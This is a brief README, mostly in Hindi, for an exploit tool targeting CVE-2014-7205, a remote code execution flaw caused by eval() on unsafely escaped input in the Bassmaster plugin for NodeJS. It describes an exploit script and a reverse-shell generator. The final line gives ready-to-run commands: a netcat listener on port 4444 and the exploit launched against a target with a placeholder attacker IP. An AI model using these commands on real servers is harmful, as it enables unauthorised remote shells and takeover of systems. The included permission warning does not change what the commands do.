
Bassmaster Plugin NodeJS RCE
bassmaster-rce.py: एक Python स्क्रिप्ट जो CVE-2014-7205 का शोषण करने के लिए है। nodeshell.py: NodeJS के लिए रिवर्स शेल उत्पन्न करने वाला एक Python मॉड्यूल
!!केवल उन सर्वरों पर उपयोग करें जिन पर आपके पास परीक्षण करने की अनुमति है
CVE-2014-7205, Bassmaster Plugin for NodeJS में एक Remote Code Execution (दूरस्थ कोड निष्पादन) कमजोरी है। सभी संस्करण <= 1.5.1 प्रभावित हैं। यह कमजोरी lib/batch.js फ़ाइल के internals.batch फंक्शन में मौजूद है, जहाँ eval() का कॉल अनुचित रूप से एस्केप किए गए उपयोगकर्ता इनपुट का उपयोग करता है (मूलतः regex यह जाँच नहीं करता कि अनुरोध में दुर्भावनापूर्ण कोड है या नहीं)।
nc -lvp 4444python3 bassmaster-rce.py -u http://target -p 8080 -l attacker.ip -P 4444